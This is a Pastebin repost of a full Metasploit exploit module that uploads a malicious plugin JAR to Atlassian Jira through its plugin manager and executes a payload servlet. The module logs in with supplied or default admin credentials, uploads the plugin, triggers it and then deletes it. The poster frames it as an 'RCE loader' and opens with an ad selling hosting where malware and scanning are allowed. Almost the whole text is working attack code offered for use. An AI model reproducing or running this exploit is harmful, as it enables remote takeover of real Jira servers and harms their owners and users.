daily pastebin goal
20%
SHARE
TWEET

[ATLASSIAN JIRA RCE LOADER] #15/11/18

xB4ckdoorREAL Nov 15th, 2018 (edited) 262 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #DISCORD: FOR SPOTS/SOURCE OR VPS THAT MALWARE AND SCANNING ARE ALLOWED: [CHEAP PRICE] :https://discord.gg/QDy3bUy or discord: b4ckdoor.porn
  2.  
  3. ##
  4. # This module requires Metasploit: https://metasploit.com/download
  5. # Current source: https://github.com/rapid7/metasploit-framework
  6. ##
  7.  
  8. class MetasploitModule < Msf::Exploit::Remote
  9.   Rank = ExcellentRanking
  10.  
  11.   include Msf::Exploit::Remote::HttpClient
  12.   include Msf::Exploit::EXE
  13.  
  14.   def initialize(info = {})
  15.     super(update_info(info,
  16.       'Name'        => 'Atlassian Jira Authenticated Upload Code Execution',
  17.       'Description' => %q{
  18.         This module can be used to execute a payload on Atlassian Jira via
  19.         the Universal Plugin Manager(UPM). The module requires valid login
  20.         credentials to an account that has access to the plugin manager.
  21.         The payload is uploaded as a JAR archive containing a servlet using
  22.         a POST request against the UPM component. The check command will
  23.         test the validity of user supplied credentials and test for access
  24.         to the plugin manager.
  25.       },
  26.       'Author'      => 'Alexander Gonzalez(dubfr33)',
  27.       'License'     => MSF_LICENSE,
  28.       'References'  =>
  29.         [
  30.           ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'],
  31.           ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'],
  32.           ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/']
  33.         ],
  34.       'Platform'    => %w[java],
  35.       'Targets'     =>
  36.         [
  37.           ['Java Universal',
  38.             {
  39.               'Arch'     => ARCH_JAVA,
  40.               'Platform' => 'java'
  41.             }
  42.           ]
  43.         ],
  44.       'DisclosureDate' => 'Feb 22 2018'))
  45.  
  46.     register_options(
  47.       [
  48.         Opt::RPORT(2990),
  49.         OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
  50.         OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
  51.         OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
  52.       ])
  53.   end
  54.  
  55.   def check
  56.     login_res = query_login
  57.     if login_res.nil?
  58.       vprint_error('Unable to access the web application!')
  59.       return CheckCode::Unknown
  60.     end
  61.     return CheckCode::Unknown unless login_res.code == 200
  62.     @session_id = get_sid(login_res)
  63.     @xsrf_token = login_res.get_html_document.at('meta[@id="atlassian-token"]')['content']
  64.     auth_res = do_auth
  65.     good_sid = get_sid(auth_res)
  66.     good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}"
  67.     res = query_upm(good_cookie)
  68.     if res.nil?
  69.       vprint_error('Unable to access the web application!')
  70.       return CheckCode::Unknown
  71.     elsif res.code == 200
  72.       return Exploit::CheckCode::Appears
  73.     else
  74.       vprint_status('Something went wrong, make sure host is up and options are correct!')
  75.       vprint_status("HTTP Response Code: #{res.code}")
  76.       return Exploit::CheckCode::Unknown
  77.     end
  78.   end
  79.  
  80.   def exploit
  81.     unless access_login?
  82.       fail_with(Failure::Unknown, 'Unable to access the web application!')
  83.     end
  84.     print_status('Retrieving Session ID and XSRF token...')
  85.     auth_res = do_auth
  86.     good_sid = get_sid(auth_res)
  87.     good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}"
  88.     res = query_for_upm_token(good_cookie)
  89.     if res.nil?
  90.       fail_with(Failure::Unknown, 'Unable to retrieve UPM token!')
  91.     end
  92.     upm_token = res.headers['upm-token']
  93.     upload_exec(upm_token, good_cookie)
  94.   end
  95.  
  96.   # Upload, execute, and remove servlet
  97.   def upload_exec(upm_token, good_cookie)
  98.     contents = ''
  99.     name = Rex::Text.rand_text_alpha(8..12)
  100.  
  101.     atlassian_plugin_xml = %Q{
  102.     <atlassian-plugin name="#{name}" key="#{name}" plugins-version="2">
  103.     <plugin-info>
  104.         <description></description>
  105.         <version>1.0</version>
  106.         <vendor name="" url="" />
  107.  
  108.         <param name="post.install.url">/plugins/servlet/metasploit/PayloadServlet</param>
  109.         <param name="post.upgrade.url">/plugins/servlet/metasploit/PayloadServlet</param>
  110.  
  111.     </plugin-info>
  112.  
  113.     <servlet name="#{name}" key="metasploit.PayloadServlet" class="metasploit.PayloadServlet">
  114.         <description>"#{name}"</description>
  115.         <url-pattern>/metasploit/PayloadServlet</url-pattern>
  116.     </servlet>
  117.  
  118.     </atlassian-plugin>
  119.     }
  120.  
  121.     # Generates .jar file for upload
  122.     zip = payload.encoded_jar
  123.     zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
  124.  
  125.     servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
  126.     zip.add_file('/metasploit/PayloadServlet.class', servlet)
  127.  
  128.     contents = zip.pack
  129.  
  130.     boundary = rand_text_numeric(27)
  131.  
  132.     data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"plugin\"; "
  133.     data << "filename=\"#{name}.jar\"\r\nContent-Type: application/x-java-archive\r\n\r\n"
  134.     data << contents
  135.     data << "\r\n--#{boundary}--"
  136.  
  137.     print_status("Attempting to upload #{name}")
  138.     res = send_request_cgi({
  139.       'uri'            => normalize_uri(target_uri.path, 'rest/plugins/1.0/'),
  140.       'vars_get'       =>
  141.         {
  142.           'token'      => "#{upm_token}"
  143.         },
  144.       'method'         => 'POST',
  145.       'data'           => data,
  146.       'headers'        =>
  147.         {
  148.           'Content-Type' => 'multipart/form-data; boundary=' + boundary,
  149.           'Cookie'       => good_cookie.to_s
  150.         }
  151.     }, 25)
  152.  
  153.     unless res && res.code == 202
  154.       print_status("Error uploading #{name}")
  155.       print_status("HTTP Response Code: #{res.code}")
  156.       print_status("Server Response: #{res.body}")
  157.       return
  158.     end
  159.  
  160.     print_status("Successfully uploaded #{name}")
  161.     print_status("Executing #{name}")
  162.     Rex::ThreadSafe.sleep(3)
  163.     send_request_cgi({
  164.       'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
  165.       'method'       => 'GET',
  166.       'cookie'       => good_cookie.to_s
  167.     })
  168.  
  169.     print_status("Deleting #{name}")
  170.     send_request_cgi({
  171.       'uri'          => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
  172.       'method'       => 'DELETE',
  173.       'cookie'       => good_cookie.to_s
  174.     })
  175.   end
  176.  
  177.   def access_login?
  178.     res = query_login
  179.     if res.nil?
  180.       fail_with(Failure::Unknown, 'Unable to access the web application!')
  181.     end
  182.     return false unless res && res.code == 200
  183.     @session_id = get_sid(res)
  184.     @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
  185.     return true
  186.   end
  187.  
  188.   # Sends GET request to login page so the HTTP response can be used
  189.   def query_login
  190.     send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'))
  191.   end
  192.  
  193.   # Queries plugin manager to verify access
  194.   def query_upm(good_cookie)
  195.     send_request_cgi({
  196.       'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'),
  197.       'method'       => 'GET',
  198.       'cookie'       => good_cookie.to_s
  199.     })
  200.   end
  201.  
  202.   # Queries API for response containing upm_token
  203.   def query_for_upm_token(good_cookie)
  204.     send_request_cgi({
  205.       'uri'          => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),
  206.       'method'       => 'GET',
  207.       'cookie'       => good_cookie.to_s
  208.     })
  209.   end
  210.  
  211.   # Authenticates to webapp with user supplied credentials
  212.   def do_auth
  213.     send_request_cgi({
  214.       'uri'              => normalize_uri(target_uri.path.to_s, 'login.jsp'),
  215.       'method'           => 'POST',
  216.       'cookie'           => "atlassian.xsrf.token=#{@xsrf_token}; #{@session_id}",
  217.       'vars_post'        => {
  218.         'os_username'    => datastore['HttpUsername'],
  219.         'os_password'    => datastore['HttpPassword'],
  220.         'os_destination' => '',
  221.         'user_role'      => '',
  222.         'atl_token'      => '',
  223.         'login'          => 'Log+In'
  224.       }
  225.     })
  226.   end
  227.  
  228.   # Finds SID from HTTP response headers
  229.   def get_sid(res)
  230.     if res.nil?
  231.       return '' if res.blank?
  232.     end
  233.     res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
  234.   end
  235. end
  236.  
  237. # 2018-11-15 #
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top